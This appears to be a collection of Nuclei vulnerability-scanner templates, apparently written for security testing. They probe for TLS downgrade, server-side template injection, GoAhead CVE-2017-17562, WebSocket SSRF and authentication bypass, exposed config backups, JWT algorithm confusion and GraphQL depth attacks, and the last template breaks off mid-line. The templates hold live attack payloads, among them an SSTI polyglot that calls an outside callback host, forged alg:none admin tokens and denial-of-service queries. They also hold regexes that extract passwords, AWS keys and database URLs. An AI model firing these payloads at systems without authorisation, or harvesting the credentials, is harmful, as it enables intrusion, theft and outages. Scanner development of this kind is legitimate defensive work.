-------------------------------------------------------------------------------- 1 | id: tls-pqc-downgrade-attack 2 | 3 | info: 4 | name: TLS Post-Quantum Cryptography Downgrade Attack Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects REAL vulnerabilities in TLS implementations that allow downgrade 9 | from post-quantum algorithms to classical cryptography. Tests actual TLS 10 | handshakes for algorithm negotiation flaws. 11 | reference: 12 | - https://datatracker.ietf.org/doc/draft-ietf-tls-hybrid-design/ 13 | - https://www.nist.gov/pqcrypto 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 16 | cvss-score: 7.4 17 | cwe-id: CWE-757 18 | tags: tls,pqc,downgrade,cryptography 19 | 20 | ssl: 21 | - address: "{{Host}}:{{Port}}" 22 | 23 | # Test various TLS versions and cipher suites 24 | min_version: tls10 25 | max_version: tls13 26 | 27 | cipher_suites: 28 | # Classical RSA/ECDSA ciphers (should be rejected if PQC-only) 29 | - "TLS_RSA_WITH_AES_128_CBC_SHA" 30 | - "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256" 31 | - "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256" 32 | 33 | matchers-condition: or 34 | matchers: 35 | # Detection 1: Server accepts classical ciphers when it shouldn't 36 | - type: word 37 | part: cipher 38 | words: 39 | - "TLS_RSA" 40 | - "TLS_ECDHE" 41 | condition: or 42 | 43 | # Detection 2: Weak TLS version accepted 44 | - type: word 45 | part: version 46 | words: 47 | - "tls10" 48 | - "tls11" 49 | 50 | http: 51 | # Test TLS configuration endpoints 52 | - method: GET 53 | path: 54 | - "{{BaseURL}}/.well-known/pqc-policy" 55 | - "{{BaseURL}}/api/tls/config" 56 | - "{{BaseURL}}/security/tls" 57 | 58 | matchers-condition: and 59 | matchers: 60 | - type: word 61 | words: 62 | - "kyber" 63 | - "dilithium" 64 | - "falcon" 65 | - "sphincs" 66 | condition: or 67 | 68 | - type: word 69 | words: 70 | - '"fallback":true' 71 | - '"allow_classical":true' 72 | - '"downgrade_permitted":true' 73 | condition: or 74 | 75 | # Test algorithm negotiation 76 | - raw: 77 | - | 78 | GET / HTTP/1.1 79 | Host: {{Hostname}} 80 | Connection: close 81 | TLS-Client-Supported-Groups: x25519_kyber768 82 | TLS-Client-Signature-Algorithms: dilithium3 83 | 84 | matchers: 85 | - type: regex 86 | part: header 87 | regex: 88 | - 'TLS-Server-Selected-Group:\s*(x25519|secp256r1|secp384r1)' 89 | - 'TLS-Server-Signature-Algorithm:\s*(rsa|ecdsa)' 90 | condition: or -------------------------------------------------------------------------------- /ssti-polyglot-multi-engine-oob.yaml: -------------------------------------------------------------------------------- 1 | id: ssti-polyglot-multi-engine-oob 2 | 3 | info: 4 | name: Server-Side Template Injection - Polyglot Multi-Engine OOB Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects Server-Side Template Injection vulnerabilities across multiple template engines 9 | using polyglot payloads with OOB confirmation for enhanced accuracy. 10 | reference: 11 | - https://portswigger.net/web-security/server-side-template-injection 12 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 15 | cvss-score: 9.8 16 | cwe-id: CWE-94,CWE-95 17 | tags: ssti,template-injection,oob,polyglot 18 | 19 | variables: 20 | callback_url: "{{interactsh-url}}" 21 | engine_id: "{{randstr}}" 22 | 23 | http: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}" 27 | - "{{BaseURL}}/search" 28 | - "{{BaseURL}}/contact" 29 | 30 | payloads: 31 | param: 32 | - "q" 33 | - "search" 34 | - "query" 35 | - "name" 36 | - "message" 37 | 38 | raw: 39 | - | 40 | GET {{path}}?{{param}}={{url_encode("<%=7*7%>#{7*7}${7*7}[%7*7%]constructor.constructor(String.fromCharCode(108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47)+\"{{callback_url}}/ssti-{{engine_id}}\"+String.fromCharCode(34))()")}} HTTP/1.1 41 | Host: {{Hostname}} 42 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 43 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 44 | Connection: close 45 | 46 | - method: POST 47 | path: 48 | - "{{BaseURL}}/search" 49 | - "{{BaseURL}}/contact" 50 | 51 | headers: 52 | Content-Type: application/x-www-form-urlencoded 53 | 54 | payloads: 55 | param: 56 | - "q" 57 | - "query" 58 | - "message" 59 | 60 | body: "{{param}}={{url_encode(\"<%=7*7%>#{7*7}${7*7}[%7*7%]constructor.constructor(String.fromCharCode(108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47)+\\\"{{callback_url}}/ssti-{{engine_id}}\\\"+String.fromCharCode(34))()\"))}}" 61 | 62 | matchers-condition: and 63 | matchers: 64 | - type: word 65 | part: interactsh_protocol 66 | words: 67 | - "http" 68 | - "dns" 69 | condition: or 70 | 71 | - type: word 72 | part: interactsh_request 73 | words: 74 | - "ssti-" 75 | 76 | extractors: 77 | - type: regex 78 | part: interactsh_request 79 | regex: 80 | - "/ssti-([a-z0-9]+)" 81 | group: 1 -------------------------------------------------------------------------------- /CVE-2017-17562.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-17562 2 | 3 | info: 4 | name: Embedthis GoAhead RCE 5 | description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. 6 | author: geeknik 7 | reference: | 8 | - https://www.elttam.com/blog/goahead/ 9 | - https://github.com/ivanitlearning/CVE-2017-17562 10 | - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 11 | severity: high 12 | tags: cve,cve2017,rce,embedthis,goahead,fuzz 13 | 14 | requests: 15 | - payloads: 16 | endpoint: 17 | - admin 18 | - apply 19 | - non-CA-rev 20 | - cgitest 21 | - checkCookie 22 | - check_user 23 | - chn/liveView 24 | - cht/liveView 25 | - cnswebserver 26 | - config 27 | - configure/set_link_neg 28 | - configure/swports_adjust 29 | - eng/liveView 30 | - firmware 31 | - getCheckCode 32 | - get_status 33 | - getmac 34 | - getparam 35 | - guest/Login 36 | - home 37 | - htmlmgr 38 | - index 39 | - index/login 40 | - jscript 41 | - kvm 42 | - liveView 43 | - login 44 | - login.asp 45 | - login/login 46 | - login/login-page 47 | - login_mgr 48 | - luci 49 | - main 50 | - main-cgi 51 | - manage/login 52 | - menu 53 | - mlogin 54 | - netbinary 55 | - nobody/Captcha 56 | - nobody/VerifyCode 57 | - normal_userLogin 58 | - otgw 59 | - page 60 | - rulectl 61 | - service 62 | - set_new_config 63 | - sl_webviewer 64 | - ssi 65 | - status 66 | - sysconf 67 | - systemutil 68 | - t/out 69 | - top 70 | - unauth 71 | - upload 72 | - variable 73 | - wanstatu 74 | - webcm 75 | - webmain 76 | - webproc 77 | - webscr 78 | - webviewLogin 79 | - webviewLogin_m64 80 | - webviewer 81 | - welcome 82 | raw: 83 | - | 84 | GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 85 | Host: {{Hostname}} 86 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 87 | Accept: */* 88 | Connection: close 89 | 90 | attack: batteringram 91 | matchers-condition: and 92 | matchers: 93 | - type: status 94 | status: 95 | - 200 96 | - type: word 97 | words: 98 | - "environment variable" 99 | - "display library search paths" 100 | condition: and 101 | -------------------------------------------------------------------------------- /websocket-relay-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-relay-oob 2 | 3 | info: 4 | name: WebSocket Message Relay OOB Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects WebSocket endpoints that relay or proxy messages to external services, 9 | potentially allowing SSRF through WebSocket message forwarding, bridge connections, 10 | or relay functionality that can be abused to reach internal services. 11 | reference: 12 | - https://portswigger.net/web-security/websockets/what-are-websockets 13 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N 16 | cvss-score: 8.2 17 | cwe-id: CWE-918 18 | tags: websocket,oob,ssrf,relay,proxy,bridge 19 | 20 | variables: 21 | callback_url: "{{interactsh-url}}" 22 | 23 | websocket: 24 | - address: "{{BaseURL}}" 25 | path: 26 | - "/ws" 27 | - "/websocket" 28 | - "/socket.io/" 29 | - "/api/ws" 30 | - "/bridge" 31 | - "/tunnel" 32 | 33 | inputs: 34 | - data: | 35 | { 36 | "type": "relay", 37 | "target": "{{callback_url}}", 38 | "relay_to": "{{callback_url}}/endpoint", 39 | "forward_url": "{{callback_url}}/webhook" 40 | } 41 | - data: | 42 | { 43 | "action": "message_relay", 44 | "relay_config": { 45 | "url": "{{callback_url}}", 46 | "method": "GET", 47 | "headers": {"User-Agent": "WebSocket-Relay"} 48 | } 49 | } 50 | - data: | 51 | { 52 | "command": "bridge_setup", 53 | "bridge_config": { 54 | "upstream": "{{callback_url}}", 55 | "downstream": "ws://{{callback_url}}/ws", 56 | "proxy_headers": true 57 | } 58 | } 59 | 60 | - address: "{{BaseURL}}" 61 | path: 62 | - "/ws/proxy" 63 | - "/websocket/forward" 64 | - "/api/ws/tunnel" 65 | 66 | inputs: 67 | - data: | 68 | { 69 | "type": "proxy_config", 70 | "proxy_target": "{{callback_url}}", 71 | "webhook_url": "{{callback_url}}/callback", 72 | "forward_all": true, 73 | "external_relay": "{{callback_url}}/relay" 74 | } 75 | - data: | 76 | { 77 | "action": "external_connect", 78 | "external_ws": "wss://{{callback_url}}/ws", 79 | "relay_messages": true, 80 | "callback_on_connect": "{{callback_url}}/connected" 81 | } 82 | - data: | 83 | { 84 | "command": "tunnel_create", 85 | "tunnel_target": "{{callback_url}}", 86 | "callback_url": "{{callback_url}}/tunnel-ready" 87 | } 88 | 89 | matchers: 90 | - type: word 91 | part: interactsh_protocol 92 | words: 93 | - "http" 94 | - "dns" 95 | condition: or -------------------------------------------------------------------------------- /php-config-backup-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: php-config-backup-exposure 2 | 3 | info: 4 | name: PHP Configuration Backup File Exposure 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects exposed PHP configuration backup files that may contain 9 | database credentials, API keys, and other sensitive configuration data. 10 | reference: 11 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/ 12 | tags: config,backup,php,exposure 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | # Common PHP config backup patterns 18 | - "{{BaseURL}}/config.php.bak" 19 | - "{{BaseURL}}/config.php.old" 20 | - "{{BaseURL}}/config.php.backup" 21 | - "{{BaseURL}}/config.php~" 22 | - "{{BaseURL}}/config.inc.php.bak" 23 | - "{{BaseURL}}/config.inc.php.old" 24 | - "{{BaseURL}}/config.inc.php.backup" 25 | - "{{BaseURL}}/configuration.php.bak" 26 | - "{{BaseURL}}/wp-config.php.bak" 27 | - "{{BaseURL}}/wp-config.php.old" 28 | - "{{BaseURL}}/database.php.bak" 29 | - "{{BaseURL}}/db.php.bak" 30 | - "{{BaseURL}}/settings.php.bak" 31 | - "{{BaseURL}}/.config.php.swp" 32 | - "{{BaseURL}}/.config.inc.php.swp" 33 | 34 | stop-at-first-match: true 35 | matchers-condition: and 36 | matchers: 37 | - type: status 38 | status: 39 | - 200 40 | 41 | # Must contain PHP code 42 | - type: word 43 | words: 44 | - "<?php" 45 | - "$" 46 | condition: and 47 | 48 | # Must contain actual configuration data - using word matching to avoid regex issues 49 | - type: word 50 | words: 51 | - "$db_password" 52 | - "$database_password" 53 | - "$db_pass" 54 | - "$mysql_password" 55 | - "$DB_PASSWORD" 56 | - "DB_PASSWORD" 57 | - "$api_key" 58 | - "$API_KEY" 59 | - "$secret_key" 60 | - "define(" 61 | condition: or 62 | 63 | # Must have assignment operators 64 | - type: word 65 | words: 66 | - "=" 67 | - "=>" 68 | 69 | # Exclude empty configs and placeholders 70 | - type: word 71 | words: 72 | - "your_password_here" 73 | - "changeme" 74 | - "xxxxxx" 75 | - "TODO" 76 | - "PLACEHOLDER" 77 | negative: true 78 | 79 | # Not an HTML error page 80 | - type: word 81 | part: header 82 | words: 83 | - "text/html" 84 | negative: true 85 | 86 | # Reasonable file size 87 | - type: dsl 88 | dsl: 89 | - "len(body) > 100 && len(body) < 524288" 90 | 91 | extractors: 92 | - type: regex 93 | name: credentials 94 | regex: 95 | - 'password.{0,5}=.{0,5}["\''](.+?)["\'']' 96 | - 'DB_PASSWORD.{0,5},.{0,5}["\''](.+?)["\'']' 97 | - 'api_key.{0,5}=.{0,5}["\'']([a-zA-Z0-9_\-]{20,})["\'']' 98 | group: 1 -------------------------------------------------------------------------------- /jwt-algorithm-confusion.yaml: -------------------------------------------------------------------------------- 1 | id: jwt-algorithm-confusion 2 | info: 3 | name: JWT Algorithm Confusion Attack Detection 4 | author: geeknik 5 | severity: critical 6 | description: | 7 | Detects JWT implementations vulnerable to algorithm confusion attacks including 8 | alg:none bypass, RSA to HMAC downgrade, and key confusion vulnerabilities. 9 | reference: 10 | - https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/ 11 | - https://portswigger.net/web-security/jwt/algorithm-confusion 12 | classification: 13 | cwe-id: CWE-347 14 | tags: jwt,authentication,bypass,critical 15 | metadata: 16 | max-request: 6 17 | 18 | variables: 19 | test_payload: "test_user_{{randstr}}" 20 | 21 | requests: 22 | - raw: 23 | - | 24 | GET {{BaseURL}}/api/user HTTP/1.1 25 | Host: {{Hostname}} 26 | Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ. 27 | 28 | - | 29 | GET {{BaseURL}}/api/user HTTP/1.1 30 | Host: {{Hostname}} 31 | Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0. 32 | 33 | - | 34 | GET {{BaseURL}}/api/user HTTP/1.1 35 | Host: {{Hostname}} 36 | Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ.YTVmNjRhYzU2NzY4ZjQ5ZGJmNzU0ZWM0YzU1MzU0YzA3YmU5NTU0ZGJmNzU0ZWM0YzU1MzU0YzA3YmU5NTU0ZA 37 | 38 | - | 39 | GET {{BaseURL}}/api/profile HTTP/1.1 40 | Host: {{Hostname}} 41 | Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ. 42 | 43 | - | 44 | GET {{BaseURL}}/api/admin HTTP/1.1 45 | Host: {{Hostname}} 46 | Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ. 47 | 48 | - | 49 | GET {{BaseURL}}/api/me HTTP/1.1 50 | Host: {{Hostname}} 51 | Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ. 52 | 53 | stop-at-first-match: true 54 | 55 | matchers-condition: and 56 | matchers: 57 | - type: status 58 | status: 59 | - 200 60 | 61 | - type: word 62 | part: body 63 | words: 64 | - '"admin"' 65 | - '"role"' 66 | - '"user"' 67 | - '"email"' 68 | - '"id"' 69 | condition: or 70 | 71 | - type: word 72 | part: body 73 | words: 74 | - "Unauthorized" 75 | - "Invalid token" 76 | - "Authentication failed" 77 | - "Access denied" 78 | negative: true 79 | 80 | extractors: 81 | - type: regex 82 | part: body 83 | regex: 84 | - '"role":\s*"([^"]+)"' 85 | - '"username":\s*"([^"]+)"' 86 | - '"email":\s*"([^"]+)"' -------------------------------------------------------------------------------- /websocket-auth-bypass-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-auth-bypass-oob 2 | 3 | info: 4 | name: WebSocket Authentication Bypass External Callback OOB 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects WebSocket authentication mechanisms that can be bypassed through external 9 | callback URLs, JWT validation endpoints, OAuth redirects, or authentication 10 | delegation to external services that can be controlled by an attacker. 11 | reference: 12 | - https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking 13 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/ 14 | - https://tools.ietf.org/html/rfc6455#section-10 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N 17 | cvss-score: 9.3 18 | cwe-id: CWE-287 19 | tags: websocket,oob,auth-bypass,jwt,oauth,delegation 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | 32 | inputs: 33 | - data: | 34 | { 35 | "type": "auth", 36 | "auth_type": "external", 37 | "validation_url": "{{callback_url}}/validate", 38 | "callback_url": "{{callback_url}}/auth-success" 39 | } 40 | - data: | 41 | { 42 | "action": "jwt_auth", 43 | "jwt_issuer": "{{callback_url}}", 44 | "validation_endpoint": "{{callback_url}}/jwt/validate", 45 | "jwks_uri": "{{callback_url}}/.well-known/jwks.json" 46 | } 47 | - data: | 48 | { 49 | "command": "oauth_setup", 50 | "oauth_provider": "{{callback_url}}", 51 | "authorization_url": "{{callback_url}}/oauth/authorize", 52 | "token_url": "{{callback_url}}/oauth/token", 53 | "redirect_uri": "{{callback_url}}/oauth/callback" 54 | } 55 | 56 | - address: "{{BaseURL}}" 57 | path: 58 | - "/ws/auth" 59 | - "/websocket/authenticate" 60 | - "/api/ws/login" 61 | 62 | inputs: 63 | - data: | 64 | { 65 | "type": "delegate_auth", 66 | "auth_delegate": "{{callback_url}}/auth", 67 | "user_info_url": "{{callback_url}}/userinfo", 68 | "trust_external": true, 69 | "callback_on_success": "{{callback_url}}/authenticated" 70 | } 71 | - data: | 72 | { 73 | "action": "saml_auth", 74 | "saml_idp": "{{callback_url}}", 75 | "sso_url": "{{callback_url}}/saml/sso", 76 | "metadata_url": "{{callback_url}}/saml/metadata", 77 | "acs_url": "{{callback_url}}/saml/acs" 78 | } 79 | - data: | 80 | { 81 | "command": "bypass_auth", 82 | "external_validator": "{{callback_url}}/bypass", 83 | "callback_url": "{{callback_url}}/bypassed" 84 | } 85 | 86 | matchers: 87 | - type: word 88 | part: interactsh_protocol 89 | words: 90 | - "http" 91 | - "dns" 92 | condition: or -------------------------------------------------------------------------------- /sensitive-config-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: sensitive-config-exposure 2 | 3 | info: 4 | name: Sensitive Configuration File Exposure Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects exposed configuration files containing actual secrets, API keys, 9 | database credentials, and other sensitive information with high-confidence 10 | pattern matching to reduce false positives. 11 | reference: 12 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/ 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 15 | cvss-score: 7.5 16 | cwe-id: CWE-200,CWE-213 17 | tags: config,exposure,secrets,credentials 18 | 19 | http: 20 | - method: GET 21 | path: 22 | - "{{BaseURL}}/config.js" 23 | - "{{BaseURL}}/config.json" 24 | - "{{BaseURL}}/settings.js" 25 | - "{{BaseURL}}/settings.json" 26 | - "{{BaseURL}}/app.config.js" 27 | - "{{BaseURL}}/.env.js" 28 | - "{{BaseURL}}/env.js" 29 | - "{{BaseURL}}/api/config" 30 | - "{{BaseURL}}/api/settings" 31 | 32 | matchers-condition: and 33 | matchers: 34 | - type: status 35 | status: 36 | - 200 37 | 38 | # Must have valid config structure 39 | - type: regex 40 | regex: 41 | - '(const|let|var|export|module\.exports)\s*=\s*\{' # JS config object 42 | - '^\s*\{[\s\S]*\}\s*$' # JSON object 43 | condition: or 44 | 45 | # Must contain actual secrets (high-confidence patterns) 46 | - type: regex 47 | regex: 48 | # AWS credentials 49 | - 'AKIA[0-9A-Z]{16}' 50 | - 'aws_secret_access_key["\s]*[:=]["\s]*[a-zA-Z0-9/+=]{40}' 51 | 52 | # API keys with entropy validation 53 | - 'api[_-]?key["\s]*[:=]["\s]*[a-zA-Z0-9]{32,}' 54 | - 'secret[_-]?key["\s]*[:=]["\s]*[a-zA-Z0-9]{32,}' 55 | 56 | # Database URLs with credentials 57 | - 'mongodb(\+srv)?://[^:]+:[^@]+@[^/]+/' 58 | - 'postgres://[^:]+:[^@]+@[^/]+/' 59 | - 'mysql://[^:]+:[^@]+@[^/]+/' 60 | 61 | # OAuth secrets 62 | - 'client_secret["\s]*[:=]["\s]*[a-zA-Z0-9_-]{32,}' 63 | 64 | # Private keys 65 | - '-----BEGIN (RSA |EC |DSA )?PRIVATE KEY-----' 66 | 67 | # JWT secrets 68 | - 'jwt[_-]?secret["\s]*[:=]["\s]*[a-zA-Z0-9_-]{16,}' 69 | condition: or 70 | 71 | # Exclude common false positives 72 | - type: word 73 | words: 74 | - "EXAMPLE_API_KEY" 75 | - "YOUR_API_KEY_HERE" 76 | - "placeholder" 77 | - "TODO" 78 | - "<html" 79 | - "<!DOCTYPE" 80 | negative: true 81 | 82 | extractors: 83 | - type: regex 84 | name: aws_key 85 | regex: 86 | - 'AKIA[0-9A-Z]{16}' 87 | 88 | - type: regex 89 | name: database_url 90 | regex: 91 | - '(mongodb|postgres|mysql)://[^:]+:[^@]+@[^/]+/[^\s"]*' 92 | 93 | - type: regex 94 | name: api_key 95 | regex: 96 | - '(api[_-]?key)["\s]*[:=]["\s]*([a-zA-Z0-9_-]{32,})' 97 | group: 2 -------------------------------------------------------------------------------- /websocket-origin-bypass-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-origin-bypass-oob 2 | 3 | info: 4 | name: WebSocket Origin Validation Bypass OOB Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects WebSocket endpoints with weak origin validation that can be bypassed 9 | to establish cross-origin connections and trigger external callbacks through 10 | origin spoofing, subdomain takeover scenarios, or referer manipulation. 11 | reference: 12 | - https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking 13 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets 14 | - https://christian-schneider.net/CrossSiteWebSocketHijacking.html 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 17 | cvss-score: 8.1 18 | cwe-id: CWE-346 19 | tags: websocket,oob,csrf,origin-bypass,cross-origin 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | 32 | headers: 33 | Origin: "{{callback_url}}" 34 | Referer: "{{callback_url}}/ws-client" 35 | 36 | inputs: 37 | - data: | 38 | { 39 | "type": "origin_test", 40 | "callback_url": "{{callback_url}}/origin-bypass", 41 | "external_origin": "{{callback_url}}" 42 | } 43 | - data: | 44 | { 45 | "action": "cross_origin_check", 46 | "origin": "{{callback_url}}", 47 | "allowed_origins": ["{{callback_url}}"], 48 | "callback_url": "{{callback_url}}/validated" 49 | } 50 | 51 | - address: "{{BaseURL}}" 52 | path: 53 | - "/ws" 54 | - "/websocket" 55 | - "/socket.io/" 56 | - "/api/ws" 57 | 58 | headers: 59 | Origin: "null" 60 | X-Forwarded-Host: "{{callback_url}}" 61 | X-Original-URL: "{{callback_url}}/websocket" 62 | 63 | inputs: 64 | - data: | 65 | { 66 | "type": "null_origin_bypass", 67 | "forwarded_host": "{{callback_url}}", 68 | "callback_url": "{{callback_url}}/null-origin" 69 | } 70 | 71 | - address: "{{BaseURL}}" 72 | path: 73 | - "/ws" 74 | - "/websocket" 75 | - "/socket.io/" 76 | - "/api/ws" 77 | 78 | headers: 79 | Origin: "{{Hostname}}.{{callback_url}}" 80 | Host: "{{callback_url}}" 81 | 82 | inputs: 83 | - data: | 84 | { 85 | "type": "subdomain_bypass", 86 | "spoofed_origin": "{{Hostname}}.{{callback_url}}", 87 | "callback_url": "{{callback_url}}/subdomain-bypass" 88 | } 89 | - data: | 90 | { 91 | "action": "cors_bypass", 92 | "bypass_origin": "{{callback_url}}", 93 | "trusted_domain": "{{callback_url}}", 94 | "redirect_callback": "{{callback_url}}/cors-success" 95 | } 96 | 97 | matchers: 98 | - type: word 99 | part: interactsh_protocol 100 | words: 101 | - "http" 102 | - "dns" 103 | condition: or -------------------------------------------------------------------------------- /graphql-depth-bomb.yaml: -------------------------------------------------------------------------------- 1 | id: graphql-depth-bomb 2 | info: 3 | name: GraphQL Query Depth Attack Detection 4 | author: geeknik 5 | severity: high 6 | description: | 7 | Detects GraphQL endpoints vulnerable to query depth attacks that can cause 8 | denial of service through excessive nested queries and resource exhaustion. 9 | reference: 10 | - https://www.apollographql.com/blog/graphql/security/securing-your-graphql-api-from-malicious-queries/ 11 | - https://portswigger.net/web-security/graphql 12 | classification: 13 | cwe-id: CWE-400 14 | tags: graphql,dos,api,depth-attack 15 | metadata: 16 | max-request: 4 17 | 18 | variables: 19 | depth_id: "{{randstr}}" 20 | 21 | requests: 22 | - method: POST 23 | path: 24 | - "{{BaseURL}}/graphql" 25 | - "{{BaseURL}}/api/graphql" 26 | - "{{BaseURL}}/v1/graphql" 27 | - "{{BaseURL}}/query" 28 | 29 | headers: 30 | Content-Type: application/json 31 | 32 | body: | 33 | { 34 | "query": "query DepthTest{{depth_id}} { __typename }" 35 | } 36 | 37 | - method: POST 38 | path: 39 | - "{{BaseURL}}/graphql" 40 | - "{{BaseURL}}/api/graphql" 41 | - "{{BaseURL}}/v1/graphql" 42 | - "{{BaseURL}}/query" 43 | 44 | headers: 45 | Content-Type: application/json 46 | 47 | body: | 48 | { 49 | "query": "query { user { posts { comments { author { posts { comments { author { posts { comments { author { posts { comments { text } } } } } } } } } } } } }" 50 | } 51 | 52 | - method: POST 53 | path: 54 | - "{{BaseURL}}/graphql" 55 | - "{{BaseURL}}/api/graphql" 56 | - "{{BaseURL}}/v1/graphql" 57 | - "{{BaseURL}}/query" 58 | 59 | headers: 60 | Content-Type: application/json 61 | 62 | body: | 63 | { 64 | "query": "query { node(id: 1) { ... on User { friends { friends { friends { friends { friends { friends { friends { friends { friends { friends { name } } } } } } } } } } } }" 65 | } 66 | 67 | - method: POST 68 | path: 69 | - "{{BaseURL}}/graphql" 70 | - "{{BaseURL}}/api/graphql" 71 | - "{{BaseURL}}/v1/graphql" 72 | - "{{BaseURL}}/query" 73 | 74 | headers: 75 | Content-Type: application/json 76 | 77 | body: | 78 | { 79 | "query": "fragment Recursive on User { name posts { comments { author { ...Recursive } } } } query { user { ...Recursive } }" 80 | } 81 | 82 | stop-at-first-match: true 83 | 84 | matchers-condition: or 85 | matchers: 86 | - type: word 87 | part: body 88 | words: 89 | - "Query depth limit exceeded" 90 | - "max query depth" 91 | - "query is too complex" 92 | - "Query complexity" 93 | - "depth limit" 94 | - "Maximum query depth" 95 | 96 | - type: dsl 97 | dsl: 98 | - "duration >= 5" 99 | - "status_code == 200" 100 | condition: and 101 | 102 | - type: status 103 | status: 104 | - 503 105 | - 429 106 | 107 | extractors: 108 | - type: regex 109 | part: body 110 | regex: 111 | - 'depth["\s:]+(\d+)' 112 | - 'complexity["\s:]+(\d+)' 113 | - 'cost["\s:]+(\d+)' -------------------------------------------------------------------------------- /websocket-auth-bypass-real.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-auth-bypass-real 2 | 3 | info: 4 | name: WebSocket Authentication Bypass with Real Connection Testing 5 | author: geeknik 6 | severity: critical 7 | description: | 8 | Detects ACTUAL WebSocket authentication bypasses by establishing real WebSocket 9 | connections and testing various authentication bypass techniques including 10 | missing origin validation, token manipulation, and protocol downgrade. 11 | reference: 12 | - https://portswigger.net/web-security/websockets 13 | - https://tools.ietf.org/html/rfc6455 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N 16 | cvss-score: 9.3 17 | cwe-id: CWE-287,CWE-346 18 | tags: websocket,auth-bypass,critical,real 19 | 20 | variables: 21 | callback: "{{interactsh-url}}" 22 | bypass_id: "{{randstr}}" 23 | 24 | websocket: 25 | - address: "ws://{{Hostname}}/ws" 26 | 27 | inputs: 28 | # Test 1: No authentication 29 | - data: '{"type":"connect","user":"admin"}' 30 | 31 | # Test 2: Empty token 32 | - data: '{"type":"auth","token":""}' 33 | 34 | # Test 3: Null token 35 | - data: '{"type":"auth","token":null}' 36 | 37 | # Test 